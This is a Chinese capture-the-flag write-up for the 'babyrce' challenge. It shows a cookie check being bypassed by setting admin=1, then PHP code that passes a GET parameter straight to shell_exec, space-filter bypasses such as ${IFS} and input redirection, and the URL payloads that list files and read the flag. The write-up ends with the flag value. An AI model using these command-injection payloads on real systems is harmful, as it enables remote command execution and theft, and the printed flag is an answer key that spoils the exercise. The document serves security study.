[SWPUCTF 2021 新生赛]babyrce

0×01
打开题目环境，直接看重要代码

if($_COOKIE['admin']==1) 
{
    include "../next.php";
}

发现只有当COOKIE中admin的值等于1才可以执行下一步命令，跳出下一个文件。

0×02
打开题目环境，使用burp进行抓包，在抓包信息中，添加如下代码：

COOKIE:admin=1

Forward重放
在环境中发现新的PHP文件
rasalghul.php
url/rasalghul.php进行访问
发现PHP代码

if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/ /", $ip)){
      die('nonono');
  }
  $a = shell_exec($ip);
  echo $a;
}

给了一个参数url,发现还需要进行空格绕过。
常用的绕过方法

cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt

使用url=ls${IFS}查看根目录下的文件

url/rasalghul.php/?url=ls${IFS}

发现可疑文件flllllaaaaaaggggggg，疑似flag
构造payload并进行空格绕过，读取flag

url/rasalghul.php/?url=cat${IFS}$1/flllllaaaaaaggggggg

回显flag

NSSCTF{74e32ff7-033e-4262-887f-06968c36d204}